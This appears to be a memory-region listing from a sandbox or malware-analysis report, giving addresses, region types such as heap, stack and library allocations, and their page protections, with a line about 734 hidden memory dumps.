page read and write
123F000
heap
page read and write
287A77E000
unkown
page readonly
16CB93AE000
heap
page read and write
287A7FE000
stack
page read and write
21EDC280000
heap
page read and write
1238000
heap
page read and write
3211000
trusted library allocation
page read and write
7FFAAC3D0000
trusted library allocation
page execute and read and write
10F1000
stack
page read and write
30D0000
trusted library allocation
page read and write
7FFAAC2B4000
trusted library allocation
page read and write
1BD83000
heap
page read and write
21EDC263000
heap
page read and write
7FFAAC31C000
trusted library allocation
page execute and read and write
1BDFF000
stack
page read and write
DB0000
heap
page read and write
1BCF0000
heap
page read and write
FD0000
heap
page read and write
21EDC317000
heap
page read and write
2B128F02000
heap
page read and write
131A8000
trusted library allocation
page read and write
BD4597E000
unkown
page readonly
1240000
heap
page read and write
135A562B000
heap
page read and write
1BA02000
heap
page read and write
12AF000
heap
page read and write
135A5668000
heap
page read and write
2117C200000
heap
page read and write
1B7E0000
heap
page execute and read and write
1400000
heap
page read and write
135A565A000
heap
page read and write
12C0000
heap
page read and write
2D2E000
stack
page read and write
1C890000
heap
page read and write
135A5E02000
trusted library allocation
page read and write
25157D20000
heap
page read and write
13F0000
heap
page execute and read and write
15D0000
heap
page execute and read and write
1054000
heap
page read and write
135A5657000
heap
page read and write
12C0000
heap
page read and write
1B41D000
stack
page read and write
25157E48000
heap
page read and write
25157E35000
heap
page read and write
C43000
heap
page read and write
EF1000
stack
page read and write
C00000
heap
page read and write
16CB93F3000
heap
page read and write
124F000
heap
page read and write
12AA5000
trusted library allocation
page read and write
1B3AC000
stack
page read and write
C56000
heap
page read and write
135A5677000
heap
page read and write
101C000
heap
page read and write
C3F000
heap
page read and write
7FF77C923000
unkown
page readonly
10BE000
heap
page read and write
12C5000
heap
page read and write
7FFAAC3E0000
trusted library allocation
page execute and read and write
CC1000
heap
page read and write
7FFAAC452000
trusted library allocation
page read and write
F81000
stack
page read and write
16CB940D000
heap
page read and write
12AA1000
trusted library allocation
page read and write
1013000
heap
page read and write
16CB93E3000
heap
page read and write
7FFAAC462000
trusted library allocation
page read and write
1550000
heap
page read and write
FC0000
heap
page read and write
2B128D70000
heap
page read and write
13148000
trusted library allocation
page read and write
7FFAAC2CD000
trusted library allocation
page execute and read and write
135A5613000
heap
page read and write
1200000
heap
page read and write
7FFAAC2DD000
trusted library allocation
page execute and read and write
1802000
heap
page read and write
11EC000
stack
page read and write
7FFAAC293000
trusted library allocation
page execute and read and write
2B128E40000
heap
page read and write
7FFAAC3A6000
trusted library allocation
page execute and read and write
1C780000
heap
page read and write
25157E00000
heap
page read and write
2F9E000
stack
page read and write
7FFAAC2BD000
trusted library allocation
page execute and read and write
319F000
stack
page read and write
1520000
trusted library allocation
page read and write
2B129602000
heap
page read and write
1550000
trusted library allocation
page read and write
13CF000
stack
page read and write
123A000
heap
page read and write
16CB940D000
heap
page read and write
135A5642000
heap
page read and write
287B07E000
stack
page read and write
B10000
heap
page read and write
7FFAAC2A0000
trusted library allocation
page read and write
2B129615000
heap
page read and write
1052000
heap
page read and write
21EDC1E0000
heap
page read and write
12AA3000
trusted library allocation
page read and write
7E0000
heap
page read and write
CB1000
heap
page read and write
F60000
heap
page read and write
A30000
heap
page read and write
7FFAAC452000
trusted library allocation
page read and write
1298000
heap
page read and write
BE0000
heap
page execute and read and write
21EDDCB0000
trusted library allocation
page read and write
7FF77C923000
unkown
page readonly
EFF000
stack
page read and write
2117C241000
heap
page read and write
2BB0000
heap
page read and write
16CB93A7000
heap
page read and write
25157E69000
heap
page read and write
16CB9426000
heap
page read and write
1058000
heap
page read and write
B90000
heap
page read and write
7FFB16791000
unkown
page execute read
1087000
heap
page read and write
7FFAAC2B3000
trusted library allocation
page execute and read and write
16CB93CA000
heap
page read and write
1530000
heap
page read and write
7FFAAC2D0000
trusted library allocation
page read and write
135A5550000
trusted library allocation
page read and write
7FFAAC2B0000
trusted library allocation
page read and write
1274000
heap
page read and write
There are 734 hidden memdumps, click here to show them.